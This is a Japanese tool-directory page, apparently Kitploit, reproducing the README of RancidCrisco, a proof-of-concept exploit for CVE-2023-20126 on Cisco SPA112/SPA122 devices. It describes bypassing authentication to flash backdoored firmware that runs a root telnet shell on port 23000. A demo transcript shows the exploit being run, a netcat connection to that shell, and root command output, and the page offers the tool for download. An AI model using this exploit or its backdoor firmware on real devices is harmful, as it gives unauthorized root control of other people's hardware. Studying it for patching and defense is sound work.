Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
RancidCrisco — CVE-2023-20126 用の PoC | Kitploit
ツール/GitHubGitHub/fullspectrumdev/rancidcrisco
組み込みシステムセキュリティ脆弱性分析エクスプロイトペネトレーションテストハードウェアとIoTセキュリティレッドチーミングリモートアクセスツールファームウェア解析
GitHubfullspectrumdev/rancidcrisco

RancidCrisco

CVE-2023-20126 用の PoC

リポジトリを見る
2423年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

RancidCrisco

CVE-2023-20126 の最小限の PoC

これは初期リリースです。動作しますが、「最も単純なケース」のエクスプロイトです。

SPA112/SPA122 でテスト済み、動作確認済みです。SPA232D は別のファームウェアイメージが必要です。

ポート 23000/tcp で root シェルを提供します。

ファームウェアを編集するために使用したツールチェーンをまだ整理する必要があり、おそらく別のリポジトリに置く予定です。これは主に @BigNerd95 の作業に基づいていますが、SPA112/122 のファームウェアファイルで動作するように小さな変更を加えています。

デモ.

root@kitploit:~
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin 
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.

< wait a few mins, nervously > 

$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????


BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0

ファイル

  • fwupload.py - 認証を一切送信しないことで認証をバイパスし、CVE-2023-20126 を悪用するファームウェアイメージアップローダー。引数は2つ: デバイスの Web UI の URL と、アップロードするファームウェアファイル。
  • telnet-23000.bin - telnetd -l /bin/sh -p 23000 を起動し、ポート 23000/tcp で root シェルを提供する Proof of Concept の悪意のあるファームウェアイメージ。bignerd95 の作業に基づいています。

ライセンス

WTFPL.

バグ

git issue を使用してください。

免責事項

これであなたのクソデバイスが文鎮化しても、私は一切責任を負いません。
それはあなた自身の問題です。
つまり、私はそのバックドア入りファームウェアを一晩ででっち上げたんです。
それに、なぜあなたは writeup に従って自分自身のバックドア入りファームウェアをビルドしないのですか?

ツールをダウンロード